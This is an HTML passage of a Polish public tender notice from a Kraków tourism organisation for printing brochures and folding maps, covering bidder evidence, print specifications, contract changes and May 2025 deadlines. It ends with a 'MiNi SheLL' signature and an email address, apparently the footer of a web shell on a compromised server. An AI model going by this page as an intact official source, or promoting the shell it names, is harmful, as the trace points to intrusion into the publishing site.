wykonywane należycie oraz potwierdzających wartość wykonanych (realizowanych) usług;<br/>- pisemnego zobowiązania innego podmiotu do udostępnienia zasobów (wiedzy <br/>i doświadczenia), niezbędnych do wykonania zamówienia (o ile dotyczy). <br/><br/>* Wykonawca samodzielnie ustala, które usługi uznaje za główne i tylko te wskazuje w wykazie usług oraz tylko dla tych przedstawia dowody.<br/><br/>** Dowodami, o których mowa powyżej są:<br/><br/>a)	poświadczenie (referencje);<br/>b) oświadczenie wykonawcy – jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1.<br/><br/>	W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie usług, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Ocena spełniania warunku zostanie dokonana wg formuły: „spełnia – nie spełnia”, na podstawie złożonego przez Wykonawcę:<br/>- oświadczenia o spełnianiu warunków udziału w postępowaniu,<br/>- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych* usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, <br/>- dowodów**, określających, czy usługi te zostały wykonane lub są wykonywane należycie oraz potwierdzających wartość wykonanych (realizowanych) usług;<br/>- pisemnego zobowiązania innego podmiotu do udostępnienia zasobów (wiedzy <br/>i doświadczenia), niezbędnych do wykonania zamówienia (o ile dotyczy). <br/><br/>* Wykonawca samodzielnie ustala, które usługi uznaje za główne i tylko te wskazuje w wykazie usług oraz tylko dla tych przedstawia dowody.<br/><br/>** Dowodami, o których mowa powyżej są:<br/><br/>a)	poświadczenie (referencje);<br/>b) oświadczenie wykonawcy – jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1.<br/><br/>	W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie usług, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) W<br/>celu potwierdzenia spełniania warunków określonych w pkt 8 SWZ Wykonawcy zobowiązani są przedłożyć następujące dokumenty:<br/>1) Oświadczenia:<br/>a) o spełnianiu warunków udziału w postępowaniu. Wzór oświadczenia stanowi załącznik nr 2 do SWZ,<br/>b) o braku podstaw wykluczenia. Wzór oświadczenia stanowi załącznik nr 2a do SWZ.<br/>6) Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej www.mot.krakow.pl informacji, o której mowa w art.<br/>222 ust. 5 ustawy, składa oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616, z późn. zm.), z<br/>Wykonawcami, którzy złożyli odrębne oferty w przedmiotowym postępowaniu. Wzór oświadczenia określony jest w załączniku nr 2b<br/>do SWZ. W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty<br/>bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o<br/>udzielenie zamówienia.<br/>7) Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 lub art. 109 ust. 1 pkt 2-5 i 7-10<br/>ustawy, jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki:<br/>a) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym<br/>postępowaniem, w tym poprzez zadośćuczynienie pieniężne;<br/>b) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem<br/>oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania,<br/>lub zamawiającym;<br/>c) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwom,<br/>wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:<br/>d) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy,<br/>e) zreorganizował personel,<br/>f) wdrożył system sprawozdawczości i kontroli,<br/>g) utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów,<br/>h) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych<br/>regulacji lub standardów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia, że oferowane usługi i dostawy odpowiadają wymaganiom określonym przez Zamawiającego, do oferty należy dołączyć próbki wykonanych dotychczas przez Wykonawcę przykładowych prac, których specyfikacja pozostaje zbliżona do określonej w Załączniku nr 4 do SWZ, tj.:<br/><br/>a.	dla Części I Zamówienia – Druk i dostawa wydawnictw:<br/>1)	Wydawnictwo z grzbietem zszywanym zeszytowo<br/>•	format: co najmniej A5 pionowo<br/>•	objętość: co najmniej 30 stron + 4 str. okładki,<br/>•	okładka: liczba kolorów (4+4), druk w pełnym kolorze bez możliwości podmiany czarnych płyt, papier: kreda 250g/m2 jednostronnie powlekany folią matową plus lakier UV miejscowo.<br/>•	środek: liczba kolorów (4+4), druk w pełnym kolorze bez możliwości podmiany czarnych płyt, papier kreda pół mat (silk) 100 g/m²<br/><br/>2)	Wydawnictwo ze spiralą<br/>•	format: 117mmx220mm<br/>•	co druga kartka skrzydełko: po rozłożeniu 222mmx220mm<br/>•	objętość: 110 str.+ 4 str. okładki, <br/>•	okładka bez skrzydełek przód i tył. Sposób rozmieszczenia stron w przewodniku: kartki umieszczone na przemian, krótsza, dłuższa itd.<br/>•	oprawa: spirala zielona po boku 222 mm <br/><br/>środek <br/>•	zadruk: CMYK 4+4 druk w pełnym kolorze <br/>•	papier: kreda mat 115 g/m2 <br/>okładka: <br/>•	liczba kolorów: (4+4) druk w pełnym kolorze <br/>•	kreda 300 g/m2 jednostronnie powlekana folią matową plus lakier UV miejscowo<br/><br/>b.	dla Części II Zamówienia – Druk i dostawa map składanych:<br/>Mapy składane:<br/>•	format po obcięciu (netto) – 980x680 pion<br/>•	podstawa przy złożeniu mapy: – ok. 122x227mm <br/>•	liczba stron: nie mniej niż 2<br/>•	liczba kolorów: (4 + 4) druk w pełnym kolorze<br/>•	przygotowanie do druku: naświetlanie bezpośrednio na płyty<br/>•	liniatura rastra: minimum 190 lpi<br/>•	materiał: kreda matowa 100g/m² G-PRINT <br/>•	oprawa: brak<br/>•	falcowanie map: 8 x 3 szpalty (7 x 2) łamy<br/>•	maszynowe składanie map w harmonię, niedopuszczalne jest ręczne łamanie mapy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W celu potwierdzenia, że oferowane usługi i dostawy odpowiadają wymaganiom określonym przez Zamawiającego, do oferty należy dołączyć próbki wykonanych dotychczas przez Wykonawcę przykładowych prac, których specyfikacja pozostaje zbliżona do określonej w Załączniku nr 4 do SWZ, tj.:<br/><br/>a.	dla Części I Zamówienia – Druk i dostawa wydawnictw:<br/>1)	Wydawnictwo z grzbietem zszywanym zeszytowo<br/>•	format: co najmniej A5 pionowo<br/>•	objętość: co najmniej 30 stron + 4 str. okładki,<br/>•	okładka: liczba kolorów (4+4), druk w pełnym kolorze bez możliwości podmiany czarnych płyt, papier: kreda 250g/m2 jednostronnie powlekany folią matową plus lakier UV miejscowo.<br/>•	środek: liczba kolorów (4+4), druk w pełnym kolorze bez możliwości podmiany czarnych płyt, papier kreda pół mat (silk) 100 g/m²<br/><br/>2)	Wydawnictwo ze spiralą<br/>•	format: 117mmx220mm<br/>•	co druga kartka skrzydełko: po rozłożeniu 222mmx220mm<br/>•	objętość: 110 str.+ 4 str. okładki, <br/>•	okładka bez skrzydełek przód i tył. Sposób rozmieszczenia stron w przewodniku: kartki umieszczone na przemian, krótsza, dłuższa itd.<br/>•	oprawa: spirala zielona po boku 222 mm <br/><br/>środek <br/>•	zadruk: CMYK 4+4 druk w pełnym kolorze <br/>•	papier: kreda mat 115 g/m2 <br/>okładka: <br/>•	liczba kolorów: (4+4) druk w pełnym kolorze <br/>•	kreda 300 g/m2 jednostronnie powlekana folią matową plus lakier UV miejscowo<br/><br/>b.	dla Części II Zamówienia – Druk i dostawa map składanych:<br/>Mapy składane:<br/>•	format po obcięciu (netto) – 980x680 pion<br/>•	podstawa przy złożeniu mapy: – ok. 122x227mm <br/>•	liczba stron: nie mniej niż 2<br/>•	liczba kolorów: (4 + 4) druk w pełnym kolorze<br/>•	przygotowanie do druku: naświetlanie bezpośrednio na płyty<br/>•	liniatura rastra: minimum 190 lpi<br/>•	materiał: kreda matowa 100g/m² G-PRINT <br/>•	oprawa: brak<br/>•	falcowanie map: 8 x 3 szpalty (7 x 2) łamy<br/>•	maszynowe składanie map w harmonię, niedopuszczalne jest ręczne łamanie mapy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) oświadczenie o spełnianiu warunków udziału w postępowaniu. Wzór oświadczenia stanowi załącznik nr 2 do SWZ,<br/>b) oświadczenie o braku podstaw wykluczenia. Wzór oświadczenia stanowi załącznik nr 2a do SWZ.<br/>2) W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego,<br/>oświadczenie, o którym mowa w ust. 1 składa każdy z tych Wykonawców odrębnie.<br/>3) Jeżeli Wykonawca polega na zdolnościach lub sytuacji innych podmiotów, niezależnie od charakteru prawnego łączących<br/>go z nimi stosunków, to zobowiązany jest udowodnić Zamawiającemu, iż realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów<br/>do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Dokument, z którego będzie<br/>wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy,<br/>ubiegającemu się o zamówienie odpowiedniego zasobu oraz wskazywać w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów innego podmiotu,<br/>b) sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,<br/>c) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,<br/>d) czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności<br/>dotyczą (informacje w tym zakresie należy podać, jeżeli warunek dotyczy dysponowania osobami). Przykładowy wzór<br/>zobowiązania podmiotu podany jest w załączniku nr 3 do SWZ.<br/>4) Zobowiązanie należy złożyć w oryginale.<br/>5) Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu, tj. wykazu usług wykonanych w okresie 3 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów<br/>określających czy te usługi zostały wykonane należycie oraz potwierdzających wartość zrealizowanych usług. Wzór wykazu wykonanych usług stanowi załącznik nr 3a do SWZ.<br/>Dowodami określającymi czy usługi zostały wykonane należycie, są dowody wymienione w treści § 9 ust. 1 pkt 2<br/>Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy tj.:<br/>a) referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane;<br/>b) oświadczenie Wykonawcy potwierdzające należyte wykonanie usług – jeżeli z uzasadnionych przyczyn o obiektywnym<br/>charakterze, Wykonawca nie jest w stanie uzyskać referencji bądź dokumentów, o którym mowa w lit. a, przy czym w<br/>przypadku, gdy Wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania referencji<br/>bądź dokumentów potwierdzających należyte wykonanie usług.<br/>6) Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej www.mot.krakow.pl informacji, o której mowa<br/>w art. 222 ust. 5 ustawy, składa oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616,<br/>z późn. zm.), z Wykonawcami, którzy złożyli odrębne oferty w przedmiotowym postępowaniu. Wzór oświadczenia określony<br/>jest w załączniku nr 2b do SWZ. W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz<br/>z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do<br/>zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w<br/>postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SWZ.<br/>Ponadto tacy Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do<br/>złożenia w ofercie pełnomocnictwa ustanawiającego pełnomocnika, o którym mowa w pkt 10.1.<br/>3. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w<br/>postępowaniu i zawarcia umowy.<br/>4. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>5. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed<br/>podpisaniem umowy o realizację zamówienia, są zobowiązani dostarczyć Zamawiającemu stosowną umowę regulującą<br/>współpracę, zawierającą w swojej treści minimum następujące postanowienia:<br/>1) określenie celu gospodarczego,<br/>2) określenie, który z podmiotów jest upoważniony do występowania w imieniu pozostałych przy realizacji ww. zamówienia,<br/>3) oznaczenie czasu trwania współpracy wykonawców wspólnie realizujących zamówienie obejmującego minimum okres<br/>realizacji przedmiotu zamówienia oraz gwarancji i rękojmi,<br/>4) zakaz zmian w umowie bez zgody Zamawiającego.<br/>6. Nie dopuszcza się składania umowy przedwstępnej regulującej współpracę lub umowy zawartej pod warunkiem<br/>zawieszającym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień niniejszej umowy w stosunku do treści oferty, na podstawie, której dokonano<br/>wyboru Wykonawcy, jest dopuszczalna w szczególnie uzasadnionych przypadkach, w oparciu o<br/>treść art. 455 ustawy.<br/>2. Zmiana może obejmować:<br/>a) pominięcie jakiejkolwiek części usług,<br/>b) zmiany w kolejności i terminach wykonywania usług.<br/>3. Zmiana może być wprowadzona jedną z następujących metod:Strona 6 z 7<br/>a) Wykonawca może zaproponować zmianę przez złożenie pisemnej propozycji zmiany, która<br/>zdaniem Wykonawcy w razie przyjęcia pozwoli skrócić okres realizacji umowy lub obniży koszty<br/>realizacji umowy lub w inny sposób będzie korzystna dla Zamawiającego.<br/>b) Zamawiający może przedłożyć propozycję zmiany, jeżeli jej wprowadzenie jest konieczne dla<br/>prawidłowej realizacji Projektu, i która w razie przyjęcia pozwoli skrócić okres realizacji umowy<br/>lub obniży koszty realizacji umowy lub w inny sposób będzie korzystna dla Zamawiającego lub<br/>jeżeli konieczność jej wprowadzenia wynika z decyzji krajowych lub zagranicznych Instytucji<br/>zarządzających i monitorujących realizację Projektu, ze zmiany prawa lub ze zmiany<br/>okoliczności, której nie można było przewidzieć w chwili zawarcia umowy.<br/>4. Każda ze stron przedkładając drugiej stronie propozycję zmiany, spełniającą wymogi określone<br/>w ust. 2, wraz z tą propozycją przedłoży:<br/>a) opis proponowanej zmiany,<br/>b) zakres proponowanej zmiany,<br/>c) szacunki, czy i w jaki sposób zakładana zmiana wpłynie na termin realizacji przedmiotu<br/>umowy, oraz<br/>d) szacunki dotyczące wpływu zmiany na wynagrodzenie należne Wykonawcy wraz<br/>z uzasadnieniem.<br/>5. Po otrzymaniu propozycji, Wykonawca albo Zamawiający (w zależności od przypadku) w terminie 3<br/>dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany bądź w tym terminie wystąpi do strony<br/>występującej z propozycją zmiany, przesyłając zmodyfikowaną propozycję zmiany, spełniającą<br/>wymogi opisane w ust. 3.<br/>6. W przypadku upływu terminu podanego w ust. 5, traktuje się, iż propozycja wprowadzenia zmiany<br/>została odrzucona.<br/>7. Do przesłanej zmodyfikowanej propozycji zmiany mają zastosowanie postanowienia ust. 4-5.<br/>8. Każda zmiana do umowy wymaga formy pisemnej i musi być dokonana poprzez sporządzenie<br/>zmiany do Umowy - Aneksu.<br/>9.<br/>10. Zmiana umowy dokonana z naruszeniem postanowień ust. 1 - 8 jest nieważna <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Małopolska Organizacja Turystyczna w Krakowie, Rynek Kleparski 4, lokal 13, 31-150 Kraków</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-13 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com